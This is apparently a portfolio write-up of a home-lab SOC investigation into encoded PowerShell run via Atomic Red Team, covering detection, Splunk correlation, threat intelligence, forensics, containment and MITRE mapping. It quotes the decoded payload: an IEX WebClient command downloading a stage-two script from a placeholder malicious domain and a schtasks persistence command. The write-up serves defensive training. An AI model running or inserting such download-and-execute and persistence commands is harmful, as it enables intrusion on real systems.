HIGH SEVERITY — ACTIVE INVESTIGATION
PROJECTS / SOC / INCIDENT RESPONSE
⬤ HIGH SEVERITY Incident Response MITRE ATT&CK Threat Detection

Detecting Suspicious PowerShell Activity: A Real SOC Investigation

December 10, 2024 — encoded PowerShell detected on WIN-LAB-01. From first alert to full containment in 42 minutes. Every step documented.

December 10, 2024 · 8 min read · Controlled lab exercise — Atomic Red Team
2m 15s
TIME TO DETECTION
42 min
TIME TO CONTAINMENT
4
MITRE TECHNIQUES
scroll to investigate ↓
INVESTIGATION TIMELINE
42 Minutes.
Full
Containment.
Scroll through each phase of the investigation — from first alert to remediation.
⚠ THREAT DETECTED
T+0:00
Alert Received & Initial Triage
Wazuh Rule 91816 fires on WIN-LAB-01. Alert opened in Splunk. Base64 payload decoded manually — IEX download chain + schtasks persistence identified. Severity escalated to High.
powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0AT... → IEX (New-Object Net.WebClient) .DownloadString('http://malicious[.]com/stage2.ps1')
LOG CORRELATION
T+0:05
Multi-Source Log Correlation
Splunk query across Wazuh, Suricata, and Windows event indexes. Found 3 additional PowerShell executions within 2-minute window. Suricata detected HTTP outbound to 185.220.101.42. Event ID 4698 confirmed scheduled task creation.
index=suricata OR index=wazuh host="WIN-LAB-01" | eval _time=strptime(timestamp,"%Y-%m-%dT%H:%M:%S") | sort _time | table _time,src_ip,dest_ip,alert.signature
THREAT INTEL
T+0:12
Threat Intelligence Enrichment
C2 IP 185.220.101.42 enriched via CyberOps Sidekick. AbuseIPDB: 100/100 confidence, 47 reports. VirusTotal: 8/92 flagged malicious. AlienVault OTX: linked to commodity malware campaigns. Domain registered 3 days prior to incident.
HOST FORENSICS
T+0:25
Host Forensics & Evidence Collection
Windows Event Log and Sysmon analysis. Event ID 4688: powershell.exe (parent: cmd.exe). Sysmon Event ID 1: full command line captured. Event ID 4698: "SystemUpdate" task created. File write: C:\Users\Public\update.ps1 confirmed.
CONTAINED
T+0:42
Containment & Remediation
Host isolated via firewall egress block. PID 4892 terminated. Malicious script deleted. "SystemUpdate" scheduled task removed. Forensic evidence collected: memory dump, logs, registry hive. Incident closed.
2m 15s
Time to
Detection
42 min
Time to
Containment
4
MITRE
Techniques
100%
IOCs
Documented
01. Executive Summary

On December 10, 2024, my home Mini-SOC detected encoded PowerShell execution on a lab Windows host attempting to download a remote payload and establish persistence via a scheduled task. This writeup documents the full investigation: from initial Wazuh alert through log correlation, threat intelligence enrichment, host forensics, and containment.

NOTE — Controlled exercise using Atomic Red Team against WIN-LAB-01. Production SOC procedures were followed throughout to validate the detection pipeline.
02. Initial Detection
WAZUH ALERT — RULE 91816
SeverityHigh — Level 12
HostWIN-LAB-01 (192.168.1.150)
Userlabuser
Timestamp2024-12-10 14:23:17 EST
DescriptionPowerShell encoded command detected

Raw command observed by Wazuh/Sysmon (Event ID 1):

powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQ...

Base64 decoded:

IEX (New-Object Net.WebClient).DownloadString('http://malicious[.]com/stage2.ps1')
schtasks /create /tn "SystemUpdate" /tr "powershell -File C:\Users\Public\update.ps1" /sc onlogon
Why this is critical: Two distinct malicious actions in one execution — (1) fileless payload download via IEX + WebClient, never touching disk, and (2) schtasks persistence that survives reboots. Base64 encoding specifically evades string-based detection rules.
03. Investigation Timeline
T+0:00
Alert Received & Initial Triage
Wazuh Rule 91816 fired on WIN-LAB-01. Alert opened in Splunk. Command decoded manually from Base64 — immediately identified IEX download and schtasks persistence. Severity assessed as High. Investigation started.
T+0:05
Log Correlation — Multi-Source
Splunk query across Wazuh, Suricata, and Windows event indexes. Findings: 3 additional PowerShell executions within 2-minute window. Suricata detected HTTP outbound to 185.220.101.42. Windows Event ID 4698 confirmed scheduled task creation. 
index=suricata OR index=wazuh host="WIN-LAB-01"
| eval _time=strptime(timestamp, "%Y-%m-%dT%H:%M:%S")
| sort _time
| table _time, src_ip, dest_ip, dest_port, alert.signature, full_log
T+0:12
Threat Intelligence Enrichment
Ran C2 IP 185.220.101.42 through CyberOps Sidekick:
  • AbuseIPDB: 100/100 confidence — 47 abuse reports
  • VirusTotal: 8/92 engines flagged malicious
  • AlienVault OTX: associated with commodity malware campaigns
  • Domain age: registered 3 days prior to incident
T+0:25
Host Forensics
Windows Event Log and Sysmon analysis:
  • Event ID 4688: powershell.exe process creation (parent: cmd.exe)
  • Sysmon Event ID 1: full command line captured including encoded payload
  • Event ID 4698: "SystemUpdate" scheduled task created
  • File write: C:\Users\Public\update.ps1
T+0:42
Containment & Remediation
  • Host isolated from network via firewall egress block (DNS exception kept)
  • Malicious powershell.exe (PID 4892) terminated
  • Deleted C:\Users\Public\update.ps1
  • Removed "SystemUpdate" scheduled task
  • Forensic evidence collected: memory dump, logs, registry hive
04. Indicators of Compromise
TypeValueContext
IP185.220.101.42C2 server — 100/100 AbuseIPDB, 8/92 VT flags
DOMAINmalicious[.]comStage-2 payload host — 3 days old at time of incident
FILEC:\Users\Public\update.ps1Dropped stage-2 payload script
PROCESSpowershell.exe (PID 4892)Malicious execution — parent cmd.exe
TASKSystemUpdatePersistence — triggers on user logon
HASHSQBFAFgAIAAo... (B64)Encoded command payload
05. MITRE ATT&CK Mapping
T1059.001
PowerShell
Tactic: Execution
Attacker used PowerShell to execute an encoded command, leveraging IEX + WebClient for fileless in-memory payload delivery.
T1027
Obfuscated Files
Tactic: Defense Evasion
Base64 encoding used to hide the malicious command content from string-based detection rules and casual log inspection.
T1053.005
Scheduled Task
Tactic: Persistence
"SystemUpdate" scheduled task created to re-execute the malicious PowerShell script on every user logon, surviving reboots.
T1105
Ingress Tool Transfer
Tactic: Command & Control
HTTP GET to 185.220.101.42 attempted to download stage-2 payload (stage2.ps1) from attacker-controlled infrastructure.
06. Lessons Learned
WHAT WORKED
  • Wazuh detected the encoded command within seconds of execution
  • Multi-source log correlation (HIDS + IDS + Windows events) built the full attack chain
  • Automated threat intelligence via CyberOps Sidekick added context in under 30 seconds
  • Forensic evidence collected before containment — proper chain of custody
GAPS IDENTIFIED
  • Base64 decoding was done manually — 5-minute delay that should be automated
  • No pre-built response playbook: isolation steps were recalled from memory
  • Manual network isolation took 15+ minutes — SOAR integration would cut this to seconds
IMPROVEMENTS IMPLEMENTED
  • Splunk alert now auto-decodes Base64 PowerShell commands and appends decoded content to alert
  • Custom Suricata rule written to flag PowerShell -EncodedCommand patterns at network layer
  • Incident response playbook documented for encoded PowerShell class of alerts
  • Threat intel enrichment integrated directly into Splunk alert workflow
07. Conclusion

Context is everything in SOC work. The initial Wazuh alert was a single line in the logs. By correlating data across three independent sources — HIDS, network IDS, and Windows event logs — and enriching with external threat intelligence, I was able to reconstruct the complete attack chain: initial execution → obfuscation → C2 callback attempt → persistence establishment.

Detection to containment in 42 minutes on a solo analyst workflow. The gaps identified (manual decoding, no playbook, slow isolation) are exactly the kind of friction that SOAR tooling is designed to eliminate. This investigation directly informed automation improvements to the lab pipeline.

08. Skills Demonstrated
Alert Triage Log Correlation Base64 Decoding Threat Intelligence MITRE ATT&CK Splunk SPL Wazuh HIDS Suricata IDS Sysmon Host Forensics Incident Containment Documentation
← Back to Projects